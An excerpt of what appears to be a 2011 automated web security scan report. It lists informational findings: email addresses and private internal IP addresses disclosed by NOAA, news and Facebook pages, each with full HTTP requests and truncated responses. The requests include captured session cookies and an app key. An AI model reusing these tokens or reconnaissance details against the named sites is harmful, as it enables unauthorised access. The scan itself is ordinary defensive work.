+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

20.19. http://www.srh.noaa.gov/cte.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /cte.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /cte.htm HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 176
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:36:07 GMT
Content-Length: 8089
Content-Type: text/html; charset=UTF-8
Server: Apache
Last-Modified: Fri, 23 Oct 2009 16:25:29 GMT
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.20. http://www.srh.noaa.gov/lmrfc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /lmrfc/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lmrfc/?n=lmrfc-mississippiandohioriverforecast HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 17853
Content-Type: text/html; charset=UTF-8
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:SR-LMRFC.Webmaster@noaa.gov?Subject=LMRFC Feedback" title="Contact Us">
...[SNIP]...
<a href="mailto:sr-lmrfc.webmaster@noaa.gov">sr-lmrfc.webmaster@noaa.gov</a>
...[SNIP]...

20.21. http://www.srh.noaa.gov/lmrfc/quickbrief.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /lmrfc/quickbrief.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lmrfc/quickbrief.php HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/?n=lmrfc-mississippiandohioriverforecast
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 550
Date: Mon, 09 May 2011 15:27:17 GMT
Content-Length: 36981
Content-Type: text/html; charset=UTF-8
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:SR-LMRFC.Webmaster@noaa.gov?Subject=LMRFC Feedback" title="Contact Us">
...[SNIP]...
<a href="mailto:sr-lmrfc.webmaster@noaa.gov">sr-lmrfc.webmaster@noaa.gov</a>
...[SNIP]...

20.22. http://www.srh.noaa.gov/srh.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /srh.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /srh.htm HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/cte.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:43:16 GMT
Content-Length: 6292
Content-Type: text/html; charset=UTF-8
Server: Apache
Last-Modified: Thu, 03 May 2007 21:19:11 GMT
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.23. http://www.therepublic.com/assets/gzip.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:30 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 203067

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.24. http://www.therepublic.com/assets/scripts/menu/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/scripts/menu/menu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Sun, 28 Mar 2010 17:16:20 GMT
ETag: "8340054-3316-482df8f84b700"
Accept-Ranges: bytes
Content-Length: 13078
Cache-Control: max-age=172800, public
Content-Type: application/javascript

/** jquery.color.js ****************/
/*
* jQuery Color Animations
* Copyright 2007 John Resig
* Released under the MIT and GPL licenses.
*/

(function(jQuery){

   // We override the animation for
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.25. http://www.therepublic.com/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /home/

Issue detail

The following email address was disclosed in the response:

Request

GET /home/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/login/process/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 64489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<head>
   <meta name="google-site-verification" content="rDoJHMU_Kg8iBXy4lutSBUULkgdb6uCJc0BnDPddbts
...[SNIP]...
<a href="mailto:editorial@therepublic.com">editorial@therepublic.com</a>
...[SNIP]...

20.26. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_segs=D08734_70008|D08734_72078; rsi_seg=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:49 GMT
Content-Length: 48607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicatio
...[SNIP]...
<a href="mailto:letters@usatoday.com">letters@usatoday.com</a>
...[SNIP]...

21. Private IP addresses disclosed  previous  next
There are 30 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


21.1. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=630
Expires: Mon, 09 May 2011 15:46:23 GMT
Date: Mon, 09 May 2011 15:35:53 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

21.2. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zD/r/B4K_BWwP7P5.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zD/r/B4K_BWwP7P5.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff
Cache-Control: max-age=0
If-Modified-Since: Sun, 14 Mar 2010 12:51:27 -0700
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:49:56 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=26712696
Expires: Tue, 13 Mar 2012 19:46:44 GMT
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close
Content-Length: 1009

.PNG
.
...IHDR.............l.`o....PLTE...{..p..cy.h~.....................................Jd........................................o.Uk.Pi.MZt.\t.Ys.]v.u.[......_x................[t.Xr.......c{.p.V
...[SNIP]...

21.3. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ze/r/nZW4C56WJb6.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ze/r/nZW4C56WJb6.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff
Cache-Control: max-age=0
If-Modified-Since: Mon, 15 Mar 2010 07:53:15 -0700
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1249
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:54:13 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=26781537
Expires: Wed, 14 Mar 2012 14:54:06 GMT
Date: Mon, 09 May 2011 15:35:09 GMT
Connection: close

.PNG
.
...IHDR...F...#........_....PLTE......---,,,.........///DDDddd***............)))...eee...999.........+++:::.........cccXXX......fffbbbEEE___......ggg222...(((...888000...111UUU...444......WWW
...[SNIP]...

21.4. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28449eda%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b228a95%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df385454f24%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c6a6a8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1acce1b18%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f20c6a6a8&origin=http%3A%2F%2Fwww.groupon.com%2Ff3597bd174&relation=parent&transport=postmessage&frame=f6312701c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.48
X-Cnection: close
Date: Mon, 09 May 2011 15:35:52 GMT
Content-Length: 0


21.5. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2860feb1%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f9922e08%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3536d5f4%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1841e87%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21044ecd8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/learn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1841e87&origin=http%3A%2F%2Fwww.groupon.com%2Ff15c2bf28c&relation=parent&transport=postmessage&frame=f1d0509a3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.69.23
X-Cnection: close
Date: Mon, 09 May 2011 15:38:16 GMT
Content-Length: 0


21.6. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8892c558%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1db0b9edc%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3bb62792c%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df362cb24e8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21ef6047%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/mobile
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f362cb24e8&origin=http%3A%2F%2Fwww.groupon.com%2Ff3d48b0e94&relation=parent&transport=postmessage&frame=f2b7a419f8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.42
X-Cnection: close
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 0


21.7. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b463129%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff417c8108%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
